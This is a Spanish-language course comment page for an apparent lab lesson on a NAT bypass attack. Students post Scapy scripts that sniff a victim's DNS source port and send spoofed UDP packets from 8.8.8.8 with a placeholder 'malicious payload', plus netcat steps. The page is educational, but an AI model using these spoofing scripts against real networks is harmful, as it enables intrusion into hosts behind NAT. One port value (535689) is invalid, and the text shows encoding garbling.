No tienes acceso a esta clase

隆Contin煤a aprendiendo! 脷nete y comienza a potenciar tu carrera

Ataque NAT Bypass

18/33
Recursos

Aportes 10

Preguntas 1

Ordenar por:

驴Quieres ver m谩s aportes, preguntas y respuestas de la comunidad?

o inicia sesi贸n.

El curso es excelente, tan bueno y completo que llego a perderme en varias partes. Es para repasarlo una y otra vez. El contenido s铆 vale la pena.

en casi de que raw no te funciona

d = r"Esto podira ser codigo malicioso"

esto es por la versi贸n que usa python

Con el siguiente script se puede automatizar un poco el proceso:

#!/usr/bin/python3

from scapy.all import sniff, UDP, Ether, IP, sendp

port = 0
def print_summary(pkt):
    global port
    if pkt[UDP].sport != None:
        port=pkt[UDP].sport


while port == 0:
	packets = sniff(filter="dst host 8.8.8.8 and dst port 53 and src host 192.168.120.1 and udp", count=1, iface="eth0", timeout=1, prn=print_summary)


a = Ether()
b = IP(src="8.8.8.8", dst="192.168.120.1")
c = UDP(sport=53, dport=port)
d = r"Malicious payload"

packet = a/b/c/d
sendp(packet, loop=1, inter=3, iface="eth0")

Se aprende muhco en cada clase.

NATBYPASS

El ataque de NATBypass, nos permite aprovecharnos de una vulnerabilidad de este protocolo para, como su nombre lo indica, saltarnoslo y poder generar una conexi贸n directa con el equipo a trav茅s de un puerto dado. El cual se deber谩 conocer a trav茅s de un comando que mencionaremos m谩s adelante.

  1. El primer paso es crear el paquete falso con Scapy:

    a = Ether()
    b = IP(src="8.8.8.8", dst="192.168.120.1")  //src es la red que estamos falsificando y dst es la ip p煤blica
    c= UDP(sport=53,dport=44576)  //dport es el puerto de la v铆ctima.
    d = raw(bytes_encode("Aqui va el codigo malicioso"))
    packet =a/b/c/d
    
    

    Pero debemos ser r谩pidos si queremos que el ataque funcione, por lo que, una vez armado el paquete, ejecutamos el comando en nuestra m谩quina de ubuntu que nos permite conocer el puerto al que enviaremos la solicitud falsificaa.

    echo "Mensaje" | nc -vun 8.8.8.8 53
    								 鈫		 鈫			  	鈫
    						   -Usa    -verbose -Puerto
    								Netcat -UDP			  DNS	
                           -No DNS
    								  		  Inverso         
    

Luego, en mi m谩quina atacante, reviso Wireshark en los registros DNS, valido el puerto en el protocolo UPD y lo a帽ado al siguiente comando en sapy:

packet[UDP].dport= 535689 鈫 puerto obtenido
sendp(packet,loop=1,inter=3,iface="eth0")

Wow que interesante la manera de usar nat

Muy interesante la herramienta Scapy 馃悕

Lo de raw me funciono con:

d = "Codigo malicioso"

Me qued贸 la duda, en que lenguaje debe estar escrito el c贸digo malicioso se puede insertar en el raw?